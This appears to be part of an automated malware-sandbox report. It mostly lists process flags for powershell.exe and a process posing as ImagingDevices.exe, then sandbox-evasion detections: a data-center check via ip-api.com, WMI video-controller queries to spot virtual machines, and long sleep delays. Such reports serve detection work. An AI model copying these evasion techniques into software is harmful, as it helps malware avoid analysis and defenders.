            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 3270000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 24F70000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 24D80000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 2DB0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 24960000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 24800000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599888
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599776
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599664
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599554
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599443
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599332
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599204
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599076
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598964
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598852
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598741
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598630
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598518
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598391
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598279
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598167
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598056
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597945
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597833
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597715
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597610
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597482
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597370
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597258
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597146
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597034
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596906
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596794
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596682
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596571
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596460
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596348
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596220
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596093
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595981
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595870
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595760
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595647
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595537
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595425
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595300
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595173
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595045
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594933
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594822
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594711
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594599
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594471
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594343
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2109
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7791
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3818
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6010
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWindow / User API: threadDelayed 387
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWindow / User API: threadDelayed 9707
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep count: 2109 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 7791 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7144Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 6192Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep count: 3818 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep count: 6010 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780Thread sleep count: 387 > 30
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599888s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599776s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780Thread sleep count: 134 > 30
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599664s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599554s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599443s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599332s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -9223372036854770s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780Thread sleep count: 9707 > 30
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599204s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -599076s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598964s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598852s >= -30000s
